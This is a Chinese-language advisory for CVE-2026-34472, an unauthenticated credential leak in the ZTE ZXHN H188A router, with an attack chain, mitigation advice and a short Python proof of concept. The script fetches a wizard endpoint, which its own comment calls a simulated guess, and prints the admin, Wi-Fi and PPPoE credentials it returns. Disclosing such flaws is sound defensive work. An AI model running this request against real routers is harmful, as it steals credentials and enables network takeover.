CVE-2026-34472 CVSS 7.1 高危

CVE-2026-34472 ZTE路由器凭证泄露漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34472

漏洞类型

信息泄露

CVSS评分

7.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ZTE ZXHN H188A

漏洞概述

ZTE ZXHN H188A路由器的Web管理向导接口存在严重的未经身份验证凭证披露漏洞。由于系统未对敏感页面实施访问控制，局域网内的攻击者无需登录即可直接获取设备的关键配置信息，包括管理员密码、Wi-Fi密钥及PPPoE拨号账号。此外，该漏洞可能允许攻击者在无认证情况下篡改路由器配置，造成网络完全被控。

技术细节

该漏洞的根本原因在于ZTE ZXHN H188A路由器固件在处理向导初始化或配置查询请求时，错误地绕过了正常的身份验证流程。具体而言，攻击者仅需处于同一局域网段，即可向路由器的Web服务器发送特定的HTTP GET请求至向导接口。服务器在收到请求后，未严格验证用户会话Cookie或Token，直接以JSON或明文格式返回后端存储的配置信息。泄露的信息包含极高敏感度的`admin`管理员密码、WLAN PSK（Wi-Fi密码）以及ISP提供的PPPoE拨号凭据。更为严重的是，在某些特定的固件配置下，该接口不仅支持读取，还可能接受POST请求，导致未经授权的配置修改。这使得攻击者能够接管网络设备，实施DNS劫持、中间人攻击或直接切断网络连接。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描局域网，识别出ZTE ZXHN H188A路由器设备及其IP地址。

STEP 2

2. 漏洞利用

攻击者向路由器的向导接口发送未经认证的HTTP GET请求，目标指向包含配置信息的API端点。

STEP 3

3. 数据窃取

路由器返回包含管理员密码、WLAN PSK和PPPoE凭据的敏感数据，攻击者解析并保存这些信息。

STEP 4

4. 进一步渗透

利用获取的管理员凭据登录Web管理界面，或直接利用接口漏洞修改路由器配置，实施DNS劫持或阻断网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target router IP address
TARGET_IP = "192.168.1.1"

# The vulnerable endpoint is typically part of the wizard interface
# This is a simulation based on the vulnerability description
url = f"http://{TARGET_IP}/api/backup/wizard_config.json"

try:
    # Send unauthenticated request
    response = requests.get(url, timeout=10)

    if response.status_code == 200:
        print("[+] Successfully retrieved sensitive information:")
        print(response.text)
        # Response may contain: admin_pass, wifi_psk, pppoe_user, pppoe_pass
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

影响范围

ZTE ZXHN H188A V6.0.10P2_TE

ZTE ZXHN H188A V6.0.10P3N3_TE

防御指南

临时缓解措施

如果无法立即升级固件，建议将路由器放置在隔离的VLAN中，并严格限制能够访问路由器管理界面的内网IP地址。同时，应密切关注网络流量的异常行为，检查是否存在未知的配置修改。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表